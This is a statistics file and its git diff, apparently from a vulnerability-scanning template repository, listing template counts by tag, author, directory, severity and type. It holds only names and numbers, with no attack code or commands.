e":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"avtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7fcd055cf6..2127d6d969 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,602 +1,601 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 462 | dhiyaneshdk | 202 | cves | 468 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | vulnerabilities | 234 | high | 396 | file | 42 | -| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 312 | network | 32 | -| wordpress | 166 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | +| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 | +| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | | rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 78 | misconfiguration | 114 | | | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | | cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | | lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 111 | gaurang | 42 | file | 42 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | | cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | | config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 72 | pussycat0x | 25 | network | 25 | | | | | | takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | -| cve2021 | 70 | organiccrap | 19 | fuzzing | 10 | | | | | -| token | 63 | sheikhrishad | 15 | dns | 10 | | | | | -| cve2018 | 61 | techbrunchfr | 13 | cnvd | 9 | | | | | -| apache | 60 | milo2012 | 13 | headless | 5 | | | | | -| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | -| cve2017 | 43 | suman_kar | 12 | | | | | | | +| cve2021 | 71 | organiccrap | 19 | dns | 10 | | | | | +| token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | | +| cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | | +| apache | 60 | techbrunchfr | 13 | headless | 5 | | | | | +| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | pr3r00t | 12 | | | | | | | | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | -| network | 32 | righettod | 9 | | | | | | | -| iot | 32 | aashiq | 8 | | | | | | | +| iot | 33 | righettod | 9 | | | | | | | +| network | 32 | iamthefrogy | 8 | | | | | | | +| sqli | 29 | hackergautam | 8 | | | | | | | | oracle | 29 | wdahlenb | 8 | | | | | | | -| sqli | 29 | iamthefrogy | 8 | | | | | | | | workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | hackergautam | 8 | | | | | | | -| atlassian | 26 | 0x240x23elu | 7 | | | | | | | -| jira | 25 | harshbothra_ | 7 | | | | | | | -| ssrf | 25 | r3dg33k | 7 | | | | | | | -| logs | 24 | techryptic (@tech) | 7 | | | | | | | +| misc | 27 | aashiq | 8 | | | | | | | +| atlassian | 26 | randomstr1ng | 7 | | | | | | | +| jira | 25 | oppsec | 7 | | | | | | | +| ssrf | 25 | dr_set | 7 | | | | | | | +| oob | 24 | techryptic (@tech) | 7 | | | | | | | +| logs | 24 | r3dg33k | 7 | | | | | | | | disclosure | 24 | that_juan_ | 7 | | | | | | | -| oob | 24 | emadshanab | 7 | | | | | | | -| redirect | 20 | randomstr1ng | 7 | | | | | | | +| redirect | 20 | 0x240x23elu | 7 | | | | | | | | aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | dr_set | 7 | | | | | | | -| cisco | 15 | oppsec | 7 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | +| listing | 15 | emadshanab | 7 | | | | | | | +| cisco | 15 | harshbothra_ | 7 | | | | | | | | cve2016 | 14 | philippedelteil | 6 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| misconfig | 13 | puzzlepeaches | 5 | | | | | | | +| fuzz | 13 | caspergn | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| struts | 13 | pentest_swissky | 5 | | | | | | | | debug | 13 | ganofins | 5 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| cve2015 | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | caspergn | 5 | | | | | | | -| android | 12 | puzzlepeaches | 5 | | | | | | | -| weblogic | 12 | panch0r3d | 5 | | | | | | | -| fuzz | 12 | meme-lord | 4 | | | | | | | -| dns | 11 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | xelkomy | 4 | | | | | | | -| devops | 10 | iamnoooob | 4 | | | | | | | +| android | 12 | yanyun | 5 | | | | | | | +| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | meme-lord | 4 | | | | | | | +| dns | 11 | iamnoooob | 4 | | | | | | | | cve2011 | 10 | rootxharsh | 4 | | | | | | | -| cve2012 | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | impramodsargar | 3 | | | | | | | -| magento | 9 | z3bd | 3 | | | | | | | -| jenkins | 9 | kophjager007 | 3 | | | | | | | -| airflow | 8 | fyoorer | 3 | | | | | | | -| cnvd | 8 | 0w4ys | 3 | | | | | | | +| devops | 10 | xelkomy | 4 | | | | | | | +| jenkins | 9 | binaryfigments | 3 | | | | | | | +| dlink | 9 | fyoorer | 3 | | | | | | | +| cve2012 | 9 | f1tz | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| adobe | 8 | impramodsargar | 3 | | | | | | | | ftp | 8 | shine | 3 | | | | | | | -| cve2013 | 8 | f1tz | 3 | | | | | | | -| aws | 8 | yash anand @yashanand155 | 3 | | | | | | | -| gitlab | 8 | tess | 3 | | | | | | | -| adobe | 8 | thomas_from_offensity | 3 | | | | | | | -| php | 8 | joanbono | 3 | | | | | | | -| cve2014 | 7 | 0xprial | 2 | | | | | | | -| joomla | 7 | kiblyn11 | 2 | | | | | | | -| vmware | 7 | zomsop82 | 2 | | | | | | | -| scada | 7 | bsysop | 2 | | | | | | | -| cms | 6 | davidmckennirey | 2 | | | | | | | -| nginx | 6 | 0xcrypto | 2 | | | | | | | -| rails | 6 | pxmme1337 | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| api | 6 | manas_harsh | 2 | | | | | | | -| backup | 6 | joeldeleep | 2 | | | | | | | -| citrix | 6 | hetroublemakr | 2 | | | | | | | -| rconfig | 6 | random-robbie | 2 | | | | | | | -| xxe | 6 | lotusdll | 2 | | | | | | | -| drupal | 5 | mavericknerd | 2 | | | | | | | -| solr | 5 | 0xrudra | 2 | | | | | | | -| circarlife | 5 | jarijaas | 2 | | | | | | | -| dell | 5 | 0xsapra | 2 | | | | | | | -| headless | 5 | incogbyte | 2 | | | | | | | -| lucee | 5 | unstabl3 | 2 | | | | | | | -| laravel | 5 | udit_thakkur | 2 | | | | | | | +| php | 8 | z3bd | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | 